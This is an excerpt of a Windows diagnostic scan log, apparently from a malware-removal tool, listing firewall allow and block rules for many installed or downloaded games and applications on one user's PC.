Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{3E12643C-7EBF-4744-B040-EEE763C56F6D}C:\users\miggy\appdata\local\programs\blitz\blitz.exe] => (Block) C:\users\miggy\appdata\local\programs\blitz\blitz.exe => No File
FirewallRules: [TCP Query User{8C8C4890-CEFB-4483-BC1B-8DA87FE83F73}C:\users\miggy\appdata\local\programs\blitz\blitz.exe] => (Block) C:\users\miggy\appdata\local\programs\blitz\blitz.exe => No File
FirewallRules: [{BD298CC7-821E-4819-9A26-698385BA3B7A}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe => No File
FirewallRules: [UDP Query User{4A0EBC18-06EA-4C87-87A1-4C990E41C7D3}C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe => No File
FirewallRules: [TCP Query User{D4275EA6-2DDD-4686-AA4D-9A3310805EEC}C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe => No File
FirewallRules: [UDP Query User{0DA0174C-7AB4-49C7-BA8B-8D68E76E894D}C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe] => (Allow) C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe => No File
FirewallRules: [TCP Query User{E177F9D2-5A17-47BA-89BF-EE69CFBE5A1D}C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe] => (Allow) C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe => No File
FirewallRules: [UDP Query User{1B7CBF21-ED14-4267-9095-29AE1089A8A9}C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe] => (Block) C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe => No File
FirewallRules: [TCP Query User{FF5BFDBA-25C4-4DE2-A652-F568B110169F}C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe] => (Block) C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe => No File
FirewallRules: [{12F7E6E4-EF2A-4F53-B472-BA7450D5430E}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{24770BD1-E3E6-4572-A0D8-4D8A978D0057}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{27FA26BB-7CA1-4B1B-AE4F-B1FD29FF1AF9}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{825C03FC-D3B6-45B1-ADDC-7EFCEA4A440F}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{D40D2F7F-832F-4C48-B2B4-6CBBDB1883EB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe (Blue Mammoth Games) [File not signed]
FirewallRules: [{4DE15F9F-866B-4678-9B97-FB5256AE51F9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe (Blue Mammoth Games) [File not signed]
FirewallRules: [UDP Query User{4675CE24-74D3-4FD0-8949-9C33787B0DEB}C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe] => (Block) C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe => No File
FirewallRules: [TCP Query User{AD7E69AC-9D0E-4E38-B5D3-5771108ED725}C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe] => (Block) C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe => No File
FirewallRules: [{51E6F908-35D3-4FE6-8E6D-2BE375F7A4A1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\theHunter\launcher\launcher.exe => No File
FirewallRules: [{A117C129-8E57-4A5F-BFC1-ADE3AC7A8EC5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\theHunter\launcher\launcher.exe => No File
FirewallRules: [UDP Query User{A419095C-3A92-4308-BB4D-137DADFB2060}C:\program files\epic games\paladins\binaries\win64\paladins.exe] => (Block) C:\program files\epic games\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [TCP Query User{EC003A0A-0F5B-4BC4-8027-127CDD34D741}C:\program files\epic games\paladins\binaries\win64\paladins.exe] => (Block) C:\program files\epic games\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [{3E5B1C19-9C21-45C9-9314-7F0ED6E173C9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\surviv.io - 2D Battle Royale\survivio.exe (Kongregate, Inc.) [File not signed]
FirewallRules: [{DAC12A37-5149-425C-86B1-940BE44AF9C5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\surviv.io - 2D Battle Royale\survivio.exe (Kongregate, Inc.) [File not signed]
FirewallRules: [{B9F2E208-7EBC-4F05-A81E-CF26FE6EEF73}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CS2D\CS2D.exe => No File
FirewallRules: [{6A2F2F22-97A7-4FA2-BA98-545F68C9F3DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CS2D\CS2D.exe => No File
FirewallRules: [UDP Query User{4DE89CAA-64B3-4356-9F39-88239528713C}C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe] => (Allow) C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe => No File
FirewallRules: [TCP Query User{6B8E16AD-44E7-4973-8143-46712B14266E}C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe] => (Allow) C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe => No File
FirewallRules: [{8876B45B-FEDC-4E54-9ADF-7F59DA13B3DC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{7A09F2B5-A1B3-4584-8E04-F95AB8846A6F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [UDP Query User{F2106FD5-AF63-4F80-B266-400CD20A79BA}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe => No File
FirewallRules: [TCP Query User{C406884C-8D72-4D1E-AD55-57B21037C24B}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe => No File
FirewallRules: [UDP Query User{CA1B8127-55F9-47D2-AE87-01BF3285F80A}C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe] => (Block) C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe => No File
FirewallRules: [TCP Query User{6F812FB8-9408-430F-9BEA-8F87DF1E666A}C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe] => (Block) C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe => No File
FirewallRules: [{F45FC709-9DB9-4BF4-AF32-48037B4B1E88}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CreativeDestruction\client.exe => No File
FirewallRules: [{A7BE5101-300C-4F37-B0C6-5D6F9343BFBA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CreativeDestruction\client.exe => No File
FirewallRules: [{819F6E51-8D7C-46F9-8C49-728C026C4D49}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{5FA7B7A1-F6BA-495F-BBE1-0A3F7E9BA093}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{8CC426E1-EEDA-4929-8CA9-24A340632044}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{70728EF1-D77C-44BE-BDA7-AEC73EE3F99E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A2E80910-BE5B-4FAB-AB98-C2AA35F89046}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{3035735B-83F5-4F06-BE7F-4BCC14DCEB99}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{E1A9225E-ED13-43F8-A5C3-F4F45FCC0D79}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{13629218-8017-449A-87B7-9DA4166140FA}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{65B4A04D-E3BC-447A-AC84-89535112CDC7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{80EA8F03-E09D-471C-9C23-34DB1AFD0F7E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{DCFED574-FBAA-4975-AB72-7F191FC99BC0}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{558C3052-13F1-48E1-92ED-E261F000125C}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{7709B928-D87B-4C08-9650-BD0D55B3CEAA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve Corp. -> )
FirewallRules: [{687D0ADB-4A66-4892-9CB6-7F917CFD3BBC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve Corp. -> )
FirewallRules: [{8BCE8CA2-FF28-4C33-8BA0-C864AF161A49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TotallyAccurateBattlegrounds\TotallyAccurateBattlegrounds.exe => No File
FirewallRules: [{684DABB3-C018-4657-97BB-404804BD9CB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TotallyAccurateBattlegrounds\TotallyAccurateBattlegrounds.exe => No File
FirewallRules: [TCP Query User{A61F39F5-AF5A-485E-9DA5-BCCA8CBC059D}C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe] => (Block) C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe () [File not signed]
FirewallRules: [UDP Query User{9DAD7DA6-8D85-43CC-A387-53B6B580375D}C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe] => (Block) C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe () [File not signed]
FirewallRules: [TCP Query User{BB752D12-153E-4A49-9DA1-E9B8C0985C29}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [UDP Query User{C03FC8C5-DC18-4717-84EA-0F1A1B386F5F}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [{4456857A-4FDC-4A8E-A64A-90D79024DC3C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{EF3DBDB9-75BD-4185-A412-5AAC58B32B81}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{356E3ED2-C9F8-4C1F-8D1E-A3E3ED5872AC}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{67503904-3C3F-4311-AA42-3CE968E9459B}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [{6600988A-3E8D-4BB2-9073-62009DDE9CFF}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [TCP Query User{FBE7BF86-138D-479E-B64D-825C1350D34D}C:\program files\epic games\overcooked2\overcooked2.exe] => (Allow) C:\program files\epic games\overcooked2\overcooked2.exe => No File
FirewallRules: [UDP Query User{EAEFB3E2-272C-4380-9AD8-A679DBA3FD9C}C:\program files\epic games\overcooked2\overcooked2.exe] => (Allow) C:\program files\epic games\overcooked2\overcooked2.exe => No File
FirewallRules: [TCP Query User{CBA04267-ADE7-4A8F-98D5-1179FAB47424}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{5599CAFE-FB21-4163-82A9-FFF8208FFCDF}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [TCP Query User{05814D12-6CA4-44EA-A1BB-B91ECB227500}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe () [File not signed]
FirewallRules: [UDP Query User{4DD2E8BC-DC9C-4519-8192-50B8A7C0624E}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe () [File not signed]
FirewallRules: [TCP Query User{45FCE454-50C4-44E0-A124-D38ED1D288FF}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{3B622155-C937-463E-BFD7-D4A45BACF17F}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{149A11AC-6845-4F23-9AC0-25E31A853823}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9E6ECAC2-5571-4810-91B9-B9FF72330AD0}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{1000DD04-D380-41DE-AFF9-1D848B29B0CB}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{7049F166-6EA5-48BA-89B7-C961956E64D1}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [TCP Query User{C0AB333E-B963-49AF-9D11-C36C98114DD9}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{5CC520B6-DAC6-4115-BB18-F039E1666639}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{F60FB8AB-15F5-4D67-91BD-A47314F526C4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Deceit\bin\win_x64\Deceit.exe => No File
FirewallRules: [{BB6919EA-8FF7-47DB-BD1A-68ABBA53C6B0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Deceit\bin\win_x64\Deceit.exe => No File
FirewallRules: [{55BCF914-6939-43C0-9D57-681AF1273AFC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{2E4C8ECF-4E93-45DF-B319-37EE82288616}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [TCP Query User{2904BFCE-FCC6-4FF5-B534-4ACFF3F0CFC8}C:\program files\epic games\hyperscape\hyperscape.exe] => (Allow) C:\program files\epic games\hyperscape\hyperscape.exe => No File
FirewallRules: [UDP Query User{62F001EC-E422-4990-BFD3-E1AB751FAE99}C:\program files\epic games\hyperscape\hyperscape.exe] => (Allow) C:\program files\epic games\hyperscape\hyperscape.exe => No File
FirewallRules: [{250CF44C-1F5D-4132-9FAB-DA648C1ABD26}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Splitgate\PortalWars\Binaries\Win64\PortalWars-Win64-Shipping.exe => No File
FirewallRules: [{0A964258-98FC-486F-B2EA-34A83CB40E3A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Splitgate\PortalWars\Binaries\Win64\PortalWars-Win64-Shipping.exe => No File
FirewallRules: [{47BD7F4A-BE92-48F0-B699-7F92C199E69A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Muck\Muck.exe () [File not signed]
FirewallRules: [{65CFA16F-BDC1-401E-A3F3-46394EF84F37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Muck\Muck.exe () [File not signed]
FirewallRules: [TCP Query User{05E53D1F-8F73-4D83-88D4-E3EF1D21AAD0}C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe (Shawn Hitchcock) [File not signed]
FirewallRules: [UDP Query User{D2802595-8323-4996-A3DB-B2053205A57E}C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe (Shawn Hitchcock) [File not signed]
FirewallRules: [TCP Query User{91F12ED7-2766-4E6B-827B-B816725E6E09}C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe] => (Block) C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe => No File
FirewallRules: [UDP Query User{DCFB4155-590D-4220-B40D-25CB5C9BB385}C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe] => (Block) C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe => No File
FirewallRules: [TCP Query User{3DB8DFA7-2522-4AF8-ACC6-8D45B36F7373}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Block) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => No File
FirewallRules: [UDP Query User{39AFD781-AC7A-488C-8592-BE0915131F04}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Block) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => No File
FirewallRules: [TCP Query User{B333236D-5DE9-4EAE-BC1F-B00AAD0BB549}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe => No File
FirewallRules: [UDP Query User{20E062AD-9148-410B-BDFD-326EED231C4F}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe => No File
FirewallRules: [TCP Query User{EF14DFC7-AF28-49AF-8997-0F02030DB00D}C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe] => (Allow) C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe => No File
FirewallRules: [UDP Query User{21152F44-B05B-4BBF-A8EC-EDAF24C1BA14}C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe] => (Allow) C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe => No File
FirewallRules: [TCP Query User{CC80FBC5-71E4-426F-94D6-E20D2F782855}C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe] => (Allow) C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe => No File
FirewallRules: [UDP Query User{3A99AB51-E8C5-41DD-B517-C38486ED9C07}C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe] => (Allow) C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe => No File
FirewallRules: [TCP Query User{BD2E3FBB-6427-438C-A1D4-B16A68A3EF86}C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe] => (Allow) C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe => No File
FirewallRules: [UDP Query User{0B75CCC6-30BE-48C1-87ED-1FB923820B07}C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe] => (Allow) C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe => No File
FirewallRules: [TCP Query User{63DF027F-7F80-445C-BE62-9E4CCD612957}C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [UDP Query User{75585054-1A8D-4D89-B625-99B5D06A2676}C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [TCP Query User{FA3863B9-CA16-4FF0-9083-834839CC0557}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{D6ABD18D-3DAA-4EA5-A177-840605D6010C}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{59C0890E-1D74-471F-B3F6-3F0DFB64CD8B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crab Game\Crab Game.exe () [File not signed]
FirewallRules: [{E40EC143-367E-4D37-A2AA-34EBAC71DE8B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crab Game\Crab Game.exe () [File not signed]
FirewallRules: [{3A662476-6436-4340-BDBA-D72F5B1DDBCB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StickFightTheGame\StickFight.exe () [File not signed]
FirewallRules: [{2C981B99-5654-4040-AB2C-0C85F9BF7F6D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StickFightTheGame\StickFight.exe () [File not signed]
FirewallRules: [TCP Query User{648A1015-13D1-4750-959B-B3707421499C}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{168C3E0D-E85E-4884-A7C9-B97F50C07352}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [TCP Query User{F3243ACC-FECE-4A39-814F-08991E028BD7}C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe => No File
FirewallRules: [UDP Query User{9F956304-1916-4BBE-B51E-B9955FA67210}C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe => No File
FirewallRules: [{72AFCC65-2896-411A-86AB-C02C9CDECE95}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab.exe => No File
FirewallRules: [{4E2F0CD6-5EBE-4A56-9ACE-A151BB38F9D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab.exe => No File
FirewallRules: [TCP Query User{6A6EAC4D-2160-4919-9E3B-52A6F2148730}C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{9792E1CF-36FA-4196-A0A3-10AE3AD1A005}C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [{CFD8B036-590C-4835-9836-19C2225A051D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe (ConcernedApe) [File not signed]
FirewallRules: [{C94C221F-D765-409C-9AB1-EB9B32BEF9EC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe (ConcernedApe) [File not signed]
FirewallRules: [TCP Query User{8F0BC06D-47BF-4A1B-8748-76D98EA42492}C:\program files (x86)\call of duty vanguard\vanguard.exe] => (Allow) C:\program files (x86)\call of duty vanguard\vanguard.exe => No File
FirewallRules: [UDP Query User{8C990EE8-302F-4E35-BE93-F404C8D857C8}C:\program files (x86)\call of duty vanguard\vanguard.exe] => (Allow) C:\program files (x86)\call of duty vanguard\vanguard.exe => No File
FirewallRules: [{58A4BBA7-11E4-4337-992B-6CF72F8D65AE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [{5805045B-A6F2-48E9-ADE3-6136EF9A8988}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [TCP Query User{EA95B6C7-268C-467F-84CD-4FB5AC97A4FC}C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe => No File
FirewallRules: [UDP Query User{1CE7380D-889B-43D9-9F29-2EDADE5CBBC4}C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe => No File
